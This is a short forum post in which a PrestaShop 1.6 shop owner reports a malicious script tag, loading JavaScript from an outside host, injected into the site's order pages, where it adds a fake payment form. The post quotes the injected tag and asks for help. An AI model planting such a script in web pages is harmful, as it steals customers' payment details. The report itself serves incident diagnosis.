Hello
In the code source of the order pages of my Prestashop 1.6 website, I found a script tag who is calling a malicious script
<script type="text/javascript" src="https://www.avir.ir/image/favicon.js"></script> <!DOCTYPE HTML> <!--[if lt IE 7]><html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="fr-fr"><![endif]--> <!--[if IE 7]><html class="no-js lt-ie9 lt-ie8 ie7" lang="fr-fr"><![endif]--> <!--[if IE 8]><html class="no-js lt-ie9 ie8" lang="fr-fr"><![endif]--> <!--[if gt IE 8]><html class="no-js ie9" lang="fr-fr"><![endif]--> <html lang="fr-fr"><head><meta charset="utf-8" /><title>Comman ......
This script changes the DOM and add an undesirable payment form after the PAYEMENT HOOK (I hid this form with CSS to prevent my customer to see it and use it.
Is anyone having this same issue ?
The problem seems pretty complex after 2 days of investigation, searching through all my files and all my DB without finding something interesting.